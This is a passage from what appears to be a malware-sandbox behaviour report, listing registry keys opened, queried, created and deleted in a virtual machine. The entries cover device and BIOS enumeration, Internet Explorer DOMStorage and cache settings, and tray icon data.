| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\HardwareID | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\ConfigFlags | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | N/A | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_QEMU&Prod_QEMU_DVD-ROM\4&215468a5&0&010000\Capabilities | N/A | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | N/A | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | N/A | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Internet Explorer\GPU | N/A | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-19 | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft | N/A | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com | N/A | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\bing.com | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "3095" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "13217" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "56" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoftwindows.client.cbs\ = "56" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoftwindows.client.cbs\ = "3095" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\MuiCache | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoftwindows.client.cbs | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\Total = "56" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\Total = "3047" | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoftwindows.client.cbs | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\Total = "2986" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoftwindows.client.cbs\ = "3047" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\client.cbs | N/A | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\www.bing.com | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\TrayNotify\IconStreams = 140000000700000001000100050000001400000050003a005c00480066007200650066005c004e0071007a00760061005c004e006300630051006e0067006e005c005900620070006e0079005c005a00760070006500620066006200730067005c00420061007200510065007600690072005c00420061007200510065007600690072002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f50100000000000000000000e8070400420061007200510065007600690072000a00410062006700200066007600740061007200710020007600610000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000055979165ed97da0100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff75ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000030000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff81ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000020000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff82ae2078e323294282c1e41cb67d5b9c000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000010000007b005300330038004f0053003400300034002d0031005100340033002d0034003200530032002d0039003300300035002d00360037005100520030004f003200380053005000320033007d005c0072006b006300790062006500720065002e0072006b00720000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000e8070400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff83ae2078e323294282c1e41cb67d5b9c00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\Total = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total\ = "0" | N/A | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\client.cbs\NumberOfSubdomains = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoftwindows.client.cbs\ = "2986" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | N/A | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff | N/A | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\www.bing.com | N/A | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\ = "0" | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage | N/A | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ | N/A | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\DOMStorage\client.cbs\NumberOfSubdomains = "0" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoftwindows.client.cbs_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\client.cbs\ = "0" | N/A | N/A |
